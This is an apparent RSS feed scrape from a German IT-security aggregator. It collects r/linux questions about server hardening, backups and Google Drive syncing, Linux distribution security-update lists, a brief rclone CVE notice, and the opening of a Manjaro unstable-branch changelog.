<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hey guys,</p> <p>I ordered a dedicated server that I use to host a bunch of my websites and web apps.</p> <p>However, I'm looking for some security software to protect it.</p> <p>Here are the server details and some things I have already done:</p> <p><strong>Hardware:</strong>--------------------------------</p> <ul><li><strong>Intel Xeon E-2274G</strong></li> <li><strong>4 Cores &lt;---&gt; 8 Threads</strong></li> <li><strong>4.0 GHz &lt;---&gt; 4.9 GHz</strong></li> <li><strong>64GB DDR4 RAM</strong> <ul><li><em>Expandable to 128GB when I'm ready</em></li> </ul></li> <li><strong>4 x 500GB NVMe SSD + 1 4TB HDD</strong></li> <li><strong>Dedicated 1 Gigabit Connection (Full Duplex)</strong> <ul><li><em>I couldn't afford the 10 Gigabit and I doubt I'll need it.</em></li> </ul></li> <li><strong>100TB Bandwidth Per Month</strong> <ul><li><em>Just doesn't allow CDN or excessive streaming.</em></li> </ul></li> </ul><p><strong>Software:</strong>----------------------------</p> <ul><li><strong>Rocky Linux 8 .5</strong> <ul><li><em>I could have went with any OS, but this was my personal choice since I was familiar with CentOS and it was recommended for Virtualmin over Ubuntu.</em></li> </ul></li> <li><strong>Virtualmin Pro</strong> <ul><li><em>This makes managing the server and domains so much easier. It's free but Pro was only $10. DirectAdmin was another good option.</em></li> </ul></li> <li><strong>Installatron</strong> <ul><li><em>Another cheap add-on that makes life easier for just $5. Many of my sites will be WordPress auto-blogs and this does great with them, especially with backups, staging sites and migrations. Plus, it auto-upgrades WordPress, plugins and themes.</em></li> </ul></li> <li><strong>The typical stuff such as:</strong> <ul><li><em>Apache - MariaDB - PostgreSQL - PHP-FPM - ProFTPd</em></li> <li><em>Sendmail via mail relay with Mailgun GitHub Student Plan.</em></li> <li><em>All of this came default with Virtualmin</em></li> </ul></li> <li><strong>Virtualmin has built-in Git Repositories that I haven't quite mastered yet.</strong> <ul><li><em>I was thinking of GitLab instead. Thoughts?</em></li> </ul></li> <li><strong>I'm using multiple free Cloudflare DNS accounts to obfuscate potential PBN detection.</strong> <ul><li><em>Is this even required? I just don't want all of my domains to have the same IP.</em></li> </ul></li> </ul><p><strong>Backup &amp; Security:</strong>------------------------------------------------------------</p> <ul><li><strong>Virtualmin Pro offers these Cloud Storage Providers:</strong> <ul><li><em>Amazon S3 Buckets</em></li> <li><em>Rackspace Cloud Files</em></li> <li><em>Google Cloud Storage</em></li> <li><em>Dropbox</em></li> <li><em>Backblaze -- My current choice</em></li> <li><em>I would have preferred Google Drive since I have an unlimited EDU account.</em></li> <li><em>I also wish they offered Wasabi or OneDrive.</em></li> </ul></li> <li><strong>Installation does offer Google Drive backups</strong> <ul><li><em>This is great for my WordPress sites, but I still need a great backup option for the server itself.</em></li> <li><em>I've used rclone in the past but there were always issues restoring everything back to normal.</em></li> <li><em>Virtualmin offers Bacula but I can't get it to install. I don't even know if it's any good.</em></li> <li><em>I'm considering purchasing Terabyte Drive Image Backup &amp; Restore Suite</em> <ul><li><em>Does anyone have experience with that and is it reliable?</em></li> <li><em>Complete bundle for $59.99 + 30-day trial</em></li> <li><em>Seems to have a nice community with plenty of user-scripts</em></li> </ul></li> </ul></li> <li><strong>Chroot jails &amp; Fail2Ban</strong> <ul><li><em>I'm having a difficult time configuring this. Could use some guidance.</em></li> <li><em>I've disabled password logins and require private keys.</em></li> </ul></li> <li><strong>YARA and frequently updated rules</strong></li> <li><strong>Vulners Linux Scanner (Free version)</strong></li> </ul><p><strong>The sites &amp; apps that I run on this server:</strong>------------------------------------------------------------</p> <ul><li><em>Several WordPress auto-blogs</em></li> <li><em>A Crypto P2P Exchange</em></li> <li><em>A Crypto Live Trading Exchange still in beta until I lockdown the server 110%</em></li> <li><em>A Link Management App with shortening, tracking, bio-profiles, analytics, etc.</em></li> <li><em>Top-Sites - A link directory with categories. The sites with the most votes appear at the top of their categories.</em></li> <li><em>Another link directory, but this one accepts paid promotions for backlinks since it has a DA of 79.</em></li> <li><em>A Text-To-Speech app that uses Amazon, IBM, etc. I offer this for free to all laryngectomy patients as I am one myself and know how difficult it is to communicate without a voice.</em></li> <li><em>A site for content creators to sell their content and to earn money from subscribers. Imagine if Instagram &amp; OnlyFans combined.</em></li> <li><em>An analytics app that I purchased and use on all of my sites (UXwizz \ userTrack). This is just for my use.</em></li> <li><em>An open-source web app called Dokku that's similar to Heroku. This is just for my use.</em></li> <li><em>That's it for now and I still don't even use 1/4 of my resources. I doubt I'll add anymore sites to this server though.</em></li> </ul><p><strong>So now that you know everything about my server, is there anything you can recommend?I'm open to anything but I'm especially interested in CLI backup software and security.Thank you for taking the time to read my post and I appreciate any suggestions or comments that you have to offer, as this is really my only social life since last July when they removed the cancer and my voice-box.</strong></p> <p><strong><em>Peace, Love &amp; Chicken Grease</em></strong></p> <p><strong><em>&amp;</em></strong> <strong><em>Fuck Cancer!</em></strong></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/SeedBoxer"> /u/SeedBoxer </a> <br><span><a href="https://www.reddit.com/r/linux/comments/ukwlh3/best_free_paid_options_for_security_backup/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/ukwlh3/best_free_paid_options_for_security_backup/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Most efficient solution for syncing a small directory with a cloud storage remote, from several servers at once? Ubuntu (headless) on Google Cloud VMs]]></title>
<description><![CDATA[I run some game servers, they are all separate VM instances hosted using Google Cloud service. On each one there's a 'servervault' directory which contains individual subdirectories that store every player's characters' files; one file per character. It's not a huge directory (about 2mb but slowl...]]></description>
<link>https://tsecurity.de/de/1517042/linux-tipps/most-efficient-solution-for-syncing-a-small-directory-with-a-cloud-storage-remote-from-several-servers-at-once-ubuntu-headless-on-google-cloud-vms/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1517042/linux-tipps/most-efficient-solution-for-syncing-a-small-directory-with-a-cloud-storage-remote-from-several-servers-at-once-ubuntu-headless-on-google-cloud-vms/</guid>
<pubDate>Wed, 11 Aug 2021 19:00:13 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I run some game servers, they are all separate VM instances hosted using Google Cloud service. On each one there's a 'servervault' directory which contains individual subdirectories that store every player's characters' files; one file per character. It's not a huge directory (about 2mb but slowly growing; perhaps 100 files).</p> <p>​</p> <p>These servers are all linked - players can travel with their characters from one server to the next. In practical terms this means that the contents of the 'servervault' directory needs to be kept synchronised across all servers at all times.</p> <p>​</p> <p>The only times the contents of 'servervault' are updated are when:</p> <ol><li>a player logs out of the server - this makes the server application save and close their character's file;</li> <li>a player creates a new character - this results in the creation of a new character file within a player's subdirectory;</li> <li>a new player logs in and creates their first character - new subdirectory &amp; new character file is created;</li> <li>I manually delete some character files (basically never needed).</li> </ol><p>​</p> <p>If I were running on Windows, this would be incredibly simple - just mount the 'servervault' directory on Google Drive using the Backup and Sync application, on each server. Whenever any of the above events happen on any server, Backup and Sync will quickly upload the latest version of whatever character file/subdirectory has been modified. When a player transfers a character from one server to the other, they'll be sure to find their character waiting for them on the destination server.</p> <p>​</p> <p>On Linux it seems like a nightmare to get this working because Google has never made a native Linux backup &amp; sync application. I tried Ocamlfuse, which mounts the directory and does everything I need, but it had a noticeable impact on performance.</p> <p>I thought running RClone using INotifyWait would work, but RClone doesn't actually do conflict checks to see whether the remote or local directories has the latest version of each file - instead it just either blanket copies or does a blanket sync.</p> <p>​</p> <p>So, question:</p> <ol><li>is Insync my solution? It sounds like it does a proper, conflict-checking two-way sync that will allow me to ensure only the latest character file version is kept. I can run it using an INotifyWait monitoring routine on the 'servervault' directory &amp; subdirectories.</li> <li>I heard that Insync dropped headless Linux support and only recently brought it back... this does not sound great if I'm paying for a bit of software.</li> <li>alternatively, should I just use Dropbox instead of Google Drive? I heard Dropbox have recently released a native headless Linux client - sounds like this might be ideal for my purposes? Does anyone know how the performance is?</li> <li>as another alternative, does anyone who's used Google's Cloud service for hosting VM servers know whether there's something native there that would be better suited for this? I know there are storage buckets and things but I'm a total newbie at all this and their documentation goes way over my head.</li> </ol></div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Elpoc"> /u/Elpoc </a> <br><span><a href="https://www.reddit.com/r/linux/comments/p2gua8/most_efficient_solution_for_syncing_a_small/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/p2gua8/most_efficient_solution_for_syncing_a_small/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by CentOS (linuxptp), Fedora (kernel and php), Gentoo (bladeenc, blktrace, jinja, mechanize, privoxy, and rclone), Oracle (linuxptp, ruby:2.6, and ruby:2.7), Red Hat (kernel and kpatch-patch), SUSE (kubevirt), and Ubuntu (avahi).]]></description>
<link>https://tsecurity.de/de/1512911/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1512911/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 08 Jul 2021 16:45:17 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>CentOS</b> (linuxptp), <b>Fedora</b> (kernel and php), <b>Gentoo</b> (bladeenc, blktrace, jinja, mechanize, privoxy, and rclone), <b>Oracle</b> (linuxptp, ruby:2.6, and ruby:2.7), <b>Red Hat</b> (kernel and kpatch-patch), <b>SUSE</b> (kubevirt), and <b>Ubuntu</b> (avahi).]]></content:encoded>
</item>
<item>
<title><![CDATA[Can you mount a Google Drive via SMB on a Linux Desktop?]]></title>
<description><![CDATA[Seems like not. Mounting normal folders works fine, but whenever I try to share a Google Drive folder mounting it on Linux ends up with an empty folder. No errors in dmesg/kern.log or journalctl, but when trying to ls it: -1 Invalid argument error is all I got. Could there be something missing? I...]]></description>
<link>https://tsecurity.de/de/1505329/linux-tipps/can-you-mount-a-google-drive-via-smb-on-a-linux-desktop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1505329/linux-tipps/can-you-mount-a-google-drive-via-smb-on-a-linux-desktop/</guid>
<pubDate>Tue, 15 Jun 2021 22:00:12 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Seems like not. Mounting normal folders works fine, but whenever I try to share a Google Drive folder mounting it on Linux ends up with an empty folder. No errors in dmesg/kern.log or journalctl, but when trying to ls it: -1 Invalid argument error is all I got.</p> <p>Could there be something missing? It would be great - getting rclone to behave on par with the Google's own client is not easy.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/__Dan_-__"> /u/__Dan_-__ </a> <br><span><a href="https://www.reddit.com/r/linux/comments/o0mpqp/can_you_mount_a_google_drive_via_smb_on_a_linux/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/o0mpqp/can_you_mount_a_google_drive_via_smb_on_a_linux/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ask Slashdot:  What Do You Use for Backups at Home?]]></title>
<description><![CDATA["I am curious as to what other Slashdotters use for backing up of home machines," asks long-time Slashdot reader serviscope_minor:

I moved away from the "bunch of disks with some off site" method. I found most of the methods generally had one or more of the following problems: poor Linux support...]]></description>
<link>https://tsecurity.de/de/1401911/it-security-nachrichten/ask-slashdot-what-do-you-use-for-backups-at-home/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1401911/it-security-nachrichten/ask-slashdot-what-do-you-use-for-backups-at-home/</guid>
<pubDate>Mon, 08 Mar 2021 12:30:24 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["I am curious as to what other Slashdotters use for backing up of home machines," asks long-time Slashdot reader serviscope_minor:

I moved away from the "bunch of disks with some off site" method. I found most of the methods generally had one or more of the following problems: poor Linux support, weak security (e.g. leaking file names), outrageously expensive, hard to set up, tied to a single storage supplier I don't fully trust, entirely proprietary (which makes me doubt long term stability), lack of file history, reputation for slowness, and so on. 

My current solution is Unixy: separate tools for separate jobs. Borg for backups to a local machine. Rclone for uploading to business cloud storage, versioned cloud storage to provide resistance against bitrot and other corruption. 

They're interested in "what other Slashdotters use," as well as "why and what your experience has been given more than superficial testing." So share you own thoughts in the comments. 

What do you use for backups at home?<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Ask+Slashdot%3A++What+Do+You+Use+for+Backups+at+Home%3F%3A+https%3A%2F%2Fbit.ly%2F3qluuN6"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fask.slashdot.org%2Fstory%2F21%2F03%2F07%2F1716224%2Fask-slashdot-what-do-you-use-for-backups-at-home%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://ask.slashdot.org/story/21/03/07/1716224/ask-slashdot-what-do-you-use-for-backups-at-home?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by Debian (firejail and netty), Fedora (java-1.8.0-openjdk, java-11-openjdk, rubygem-mechanize, and xpdf), Mageia (gstreamer1.0-plugins-bad, nethack, and perl-Email-MIME and perl-Email-MIME-ContentType), openSUSE (firejail, java-11-openjdk, python, and rclone), R...]]></description>
<link>https://tsecurity.de/de/1377119/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1377119/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 11 Feb 2021 15:45:25 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (firejail and netty), <b>Fedora</b> (java-1.8.0-openjdk, java-11-openjdk, rubygem-mechanize, and xpdf), <b>Mageia</b> (gstreamer1.0-plugins-bad, nethack, and perl-Email-MIME and perl-Email-MIME-ContentType), <b>openSUSE</b> (firejail, java-11-openjdk, python, and rclone), <b>Red Hat</b> (dotnet, dotnet3.1, dotnet5.0, and rh-nodejs12-nodejs), <b>SUSE</b> (firefox, kernel, python, python36, and subversion), and <b>Ubuntu</b> (gnome-autoar, junit4, openvswitch, postsrsd, and sqlite3).]]></content:encoded>
</item>
<item>
<title><![CDATA[Access Google Drive from Ubuntu]]></title>
<description><![CDATA[Hello I've been using Ubuntu for a few months now and I'm very happy with it. Only one thing bothers me a lot: No matter what program I use Google Drive does not really work well. ​ I just want to:  Have files available offline (e.g. a folder that is synced all the time). When I drag files to a f...]]></description>
<link>https://tsecurity.de/de/1373841/linux-tipps/access-google-drive-from-ubuntu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1373841/linux-tipps/access-google-drive-from-ubuntu/</guid>
<pubDate>Tue, 09 Feb 2021 08:00:14 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hello I've been using Ubuntu for a few months now and I'm very happy with it. Only one thing bothers me a lot: No matter what program I use Google Drive does not really work well.</p> <p>​</p> <p>I just want to:</p> <ul> <li>Have files available offline (e.g. a folder that is synced all the time).</li> <li>When I drag files to a folder, I want them to be visible on Google Drive within 1-2 minutes.</li> </ul> <p>​</p> <p>So far I have tested the following programs:</p> <ul> <li>opendrive (doesnt sync some files)</li> <li>vgrive (deletes entire folders sometimes)</li> <li>rclone (no offline access)</li> <li>gnome online accounts (no offline access)</li> <li>InSync (works great, but costs too much money)</li> </ul> <p>​</p> <p>If it is easier I also like to use Microsoft OneDrive. The main thing is to have a cloud storage that I can access from my computer.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/KekTuts"> /u/KekTuts </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/lfxgv3/access_google_drive_from_ubuntu/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/lfxgv3/access_google_drive_from_ubuntu/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[rclone vs onedrive client]]></title>
<description><![CDATA[I'm looking to live continuous sync onedrive to my desktop. Which one is better rclone or the dedicated onedrive client maintained here github.com/abraunegg/onedrive? Both look good.    submitted by    /u/TonyStark998   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/1359659/linux-tipps/rclone-vs-onedrive-client/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1359659/linux-tipps/rclone-vs-onedrive-client/</guid>
<pubDate>Mon, 25 Jan 2021 02:15:22 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I'm looking to live continuous sync onedrive to my desktop. Which one is better rclone or the dedicated onedrive client maintained here <a href="https://github.com/abraunegg/onedrive">github.com/abraunegg/onedrive</a>? Both look good.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/TonyStark998"> /u/TonyStark998 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/l4czvy/rclone_vs_onedrive_client/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/l4czvy/rclone_vs_onedrive_client/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rclone up to 1.53.2 entropy [CVE-2020-28924]]]></title>
<description><![CDATA[A vulnerability was found in Rclone up to 1.53.2. It has been declared as problematic. Affected by this vulnerability is an unknown part. Upgrading to version 1.53.3 eliminates this vulnerability.]]></description>
<link>https://tsecurity.de/de/1322006/sicherheitsluecken/rclone-up-to-1532-entropy-cve-2020-28924/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1322006/sicherheitsluecken/rclone-up-to-1532-entropy-cve-2020-28924/</guid>
<pubDate>Wed, 09 Dec 2020 11:32:42 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.rclone">Rclone up to 1.53.2</a>. It has been declared as problematic. Affected by this vulnerability is an unknown part. Upgrading to version 1.53.3 eliminates this vulnerability.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Arch Linux (ceph, gitea, matrix-synapse, musl, mutt, neomutt, opensc, and webkit2gtk), Debian (debian-security-support, openldap, salt, xen, and xorg-server), Fedora (fossil, pdfresurrect, tcpdump, thunderbird, and xorg-x11-server), Gentoo (chromium, firefox, ...]]></description>
<link>https://tsecurity.de/de/1319728/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1319728/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 07 Dec 2020 16:15:16 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Arch Linux</b> (ceph, gitea, matrix-synapse, musl, mutt, neomutt, opensc, and webkit2gtk), <b>Debian</b> (debian-security-support, openldap, salt, xen, and xorg-server), <b>Fedora</b> (fossil, pdfresurrect, tcpdump, thunderbird, and xorg-x11-server), <b>Gentoo</b> (chromium, firefox, mariadb, pam, postgresql, seamonkey, thunderbird, and xorg-server), <b>Mageia</b> (mutt, pdfresurrect, privoxy, and thunderbird), <b>openSUSE</b> (chromium, java-1_8_0-openjdk, kernel, minidlna, neomutt, opera, pngcheck, python, python-cryptography, python-pip, python-setuptools, python3, rclone, thunderbird, xen, and xorg-x11-server), <b>Red Hat</b> (ksh and net-snmp), and <b>SUSE</b> (crowbar-openstack, grafana, influxdb, python-urllib3, fontforge, mariadb, mutt, postgresql12, python-cryptography, and xen).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Arch Linux (c-ares, libass, raptor, rclone, and swtpm), Debian (libproxy, qemu, tcpflow, and x11vnc), Fedora (asterisk, c-ares, microcode_ctl, moodle, pam, tcpdump, and webkit2gtk3), Mageia (jruby and webkit2), openSUSE (buildah, c-ares, ceph, fontforge, java-...]]></description>
<link>https://tsecurity.de/de/1312994/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1312994/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 30 Nov 2020 17:15:23 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Arch Linux</b> (c-ares, libass, raptor, rclone, and swtpm), <b>Debian</b> (libproxy, qemu, tcpflow, and x11vnc), <b>Fedora</b> (asterisk, c-ares, microcode_ctl, moodle, pam, tcpdump, and webkit2gtk3), <b>Mageia</b> (jruby and webkit2), <b>openSUSE</b> (buildah, c-ares, ceph, fontforge, java-1_8_0-openjdk, kernel, LibVNCServer, mariadb, thunderbird, ucode-intel, and wireshark), <b>Red Hat</b> (firefox, rh-mariadb103-mariadb and rh-mariadb103-galera, and thunderbird), <b>SUSE</b> (binutils, libssh2_org, LibVNCServer, libX11, and nodejs12), and <b>Ubuntu</b> (mysql-8.0 and qemu).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by Arch Linux (go, libxml2, postgresql, and wireshark-cli), Debian (drupal7 and lxml), Fedora (drupal7, java-1.8.0-openjdk-aarch32, libxml2, pacemaker, slurm, and swtpm), openSUSE (c-ares, ceph, chromium, dash, firefox, go1.14, java-1_8_0-openjdk, kernel, krb5, p...]]></description>
<link>https://tsecurity.de/de/1310418/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1310418/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 27 Nov 2020 15:30:14 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Arch Linux</b> (go, libxml2, postgresql, and wireshark-cli), <b>Debian</b> (drupal7 and lxml), <b>Fedora</b> (drupal7, java-1.8.0-openjdk-aarch32, libxml2, pacemaker, slurm, and swtpm), <b>openSUSE</b> (c-ares, ceph, chromium, dash, firefox, go1.14, java-1_8_0-openjdk, kernel, krb5, perl-DBI, podman, postgresql10, postgresql12, rclone, slurm, ucode-intel, wireshark, wpa_supplicant, and xen), <b>SUSE</b> (ceph, firefox, kernel, LibVNCServer, and python), and <b>Ubuntu</b> (freerdp, poppler, and xdg-utils).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by Debian (spip and webkit2gtk), Fedora (kernel and libexif), openSUSE (chromium and rclone), Slackware (mutt), SUSE (kernel, mariadb, and slurm), and Ubuntu (igraph).]]></description>
<link>https://tsecurity.de/de/1308036/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1308036/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 25 Nov 2020 16:15:19 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (spip and webkit2gtk), <b>Fedora</b> (kernel and libexif), <b>openSUSE</b> (chromium and rclone), <b>Slackware</b> (mutt), <b>SUSE</b> (kernel, mariadb, and slurm), and <b>Ubuntu</b> (igraph).]]></content:encoded>
</item>
<item>
<title><![CDATA[[Unstable Update] 2020-11-22 - Kernels, Qt 5.15.2, Thunderbird 78.5.0, Wine, AMDVLK]]></title>
<description><![CDATA[Hello community,
Another unstable branch update with some usual updates for you!
1920×1080 253 KB
Unleash the Ryzen Power #stayhome, #staysafe, #stayhealthy

Most of our Kernels got renewed

KDE-git got another updates

Qt5 got updated to 5.15.2. Let us know if you face any issues with this.

Thu...]]></description>
<link>https://tsecurity.de/de/1304593/unix-server/unstable-update-2020-11-22-kernels-qt-5152-thunderbird-7850-wine-amdvlk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1304593/unix-server/unstable-update-2020-11-22-kernels-qt-5152-thunderbird-7850-wine-amdvlk/</guid>
<pubDate>Sun, 22 Nov 2020 15:17:50 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello community,</p>
<p>Another <strong>unstable</strong> branch update with some usual updates for you!</p>
<p></p><div class="lightbox-wrapper"><a class="lightbox" href="https://forum.manjaro.org/uploads/default/original/2X/b/b088294f4fc1d669206d51460275e4901a9834c5.jpeg" data-download-href="https://forum.manjaro.org/uploads/default/b088294f4fc1d669206d51460275e4901a9834c5" title=""><img src="https://forum.manjaro.org/uploads/default/optimized/2X/b/b088294f4fc1d669206d51460275e4901a9834c5_2_690x388.jpeg" alt="" data-base62-sha1="pbFL4i8Wsc5mMnpdrP1w2Zki097" width="690" height="388" srcset="https://forum.manjaro.org/uploads/default/optimized/2X/b/b088294f4fc1d669206d51460275e4901a9834c5_2_690x388.jpeg, https://forum.manjaro.org/uploads/default/optimized/2X/b/b088294f4fc1d669206d51460275e4901a9834c5_2_1035x582.jpeg 1.5x, https://forum.manjaro.org/uploads/default/optimized/2X/b/b088294f4fc1d669206d51460275e4901a9834c5_2_1380x776.jpeg 2x" data-small-upload="https://forum.manjaro.org/uploads/default/optimized/2X/b/b088294f4fc1d669206d51460275e4901a9834c5_2_10x10.png"><div class="meta"><svg class="fa d-icon d-icon-far-image svg-icon" aria-hidden="true"><use xlink:href="#far-image"></use></svg><span class="filename"></span><span class="informations">1920×1080 253 KB</span><svg class="fa d-icon d-icon-discourse-expand svg-icon" aria-hidden="true"><use xlink:href="#discourse-expand"></use></svg></div></a></div><br>
<em>Unleash the <a href="https://manjarocomputer.eu/index.php/manjaro-mini-pc-amd-ryzen.html">Ryzen Power</a> <span class="hashtag">#stayhome</span>, <span class="hashtag">#staysafe</span>, <span class="hashtag">#stayhealthy</span></em>
<ul>
<li>Most of our <strong>Kernels</strong> got renewed</li>
<li>
<strong>KDE-git</strong> got another updates</li>
<li>
<strong>Qt5</strong> got updated to <a href="https://www.qt.io/blog/qt-5.15.2-released">5.15.2</a>. Let us know if you face any issues with this.</li>
<li>
<strong>Thunderbird</strong> is now at <a href="https://www.thunderbird.net/en-US/thunderbird/78.5.0/releasenotes/">78.5.0</a>
</li>
<li>
<strong>Wine</strong> got updated to <a href="https://www.winehq.org/announce/5.22">5.22</a>
</li>
<li>
<strong>AMDVLK</strong> is now at <a href="https://github.com/GPUOpen-Drivers/AMDVLK/releases/tag/v-2020.Q4.5">2020.Q4.5</a>
</li>
<li>Usual <strong>Python</strong> and <strong>Haskell</strong> package updates and rebuilds</li>
</ul>
<p>If you like following latest Plasma development you may also like to check out our current version of <a href="https://osdn.net/projects/manjaro-community/storage/kde-dev/20.2/">manjaro-kde-dev</a>, which we build on a regular basis against kde-git master packages. Also check out our latest <strong>Manjaro Nibia 20.2</strong> release candidate! <a href="https://osdn.net/projects/manjaro/storage/kde/20.2-rc2/">KDE</a>, <a href="https://osdn.net/projects/manjaro/storage/xfce/20.2-rc2/">XFCE</a> and <a href="https://osdn.net/projects/manjaro/storage/gnome/20.2-rc2/">Gnome</a></p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux44 4.4.244</li>
<li>linux49 4.9.244</li>
<li>linux414 4.14.207</li>
<li>linux419 4.19.158</li>
<li>linux54 5.4.78</li>
<li>linux57 5.7.19 [EOL]</li>
<li>linux58 5.8.18 [EOL]</li>
<li>linux59 5.9.9</li>
<li>linux510 5.10-rc4</li>
<li>linux54-rt 5.4.77_rt43</li>
<li>linux59-rt 5.9.1_rt19</li>
</ul>
<p><strong>Packages Changes</strong> (Sun Nov 22 12:03:04 CET 2020)</p>
<pre><code class="lang-auto">:: Different overlay package(s) in repository community x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-11-17           2020-11-22
-------------------------------------------------------------------------------
                          attica-git5.76.0.r772.gcd8b661-15.77.0.r773.g2c73a52-1
                           baloo-git5.77.0.r2868.g401bf2d7-15.77.0.r2870.ga3f89155-1
                       bluedevil-git5.20.80.r2199.g5dae4ed5-15.20.80.r2201.gdd8baa6a-1
                        bluez-qt-git5.76.0.r615.g12739b7-15.77.0.r616.g87ea42d-1
                          breeze-git5.20.80.r2088.g7f18a88c-15.20.80.r2091.g2f351fe1-1
                    breeze-icons-git5.76.0.r1655.g8512583f-15.77.0.r1657.g74ac1f79-1
                       calindori-git   1.2.r39.ge4aa288-1    1.3.r0.ga9eb355-1
                               cpu-x 4.0.1.r66.g790bb88-1 4.0.1.r68.g0cd9a3e-1
                        discover-git5.20.80.r7868.g189f2f9d-15.20.80.r7878.gdeb599b8-1
                          disman-git0.520.80.r1773.ga3971e7-10.520.80.r1773.ga3971e7-2
                         edid-decode       r474.9ef2c6e-1       r486.474485f-1
                 freedownloadmanager        6.11.0.3218-1        6.12.1.3374-1
gnome-control-center-pop-shell-shortcuts           3.38.1-1.1                    -
     gnome-shell-extension-pop-shell              1.0.2-1              1.0.3-1
                           jadesktop              1.2.3-1              1.2.4-1
               kactivities-stats-git5.77.0.r306.g791d7d7-15.77.0.r310.gf15381a-1
                            kalk-git   0.1.r35.gc90941f-1   0.1.r39.g44d7e20-1
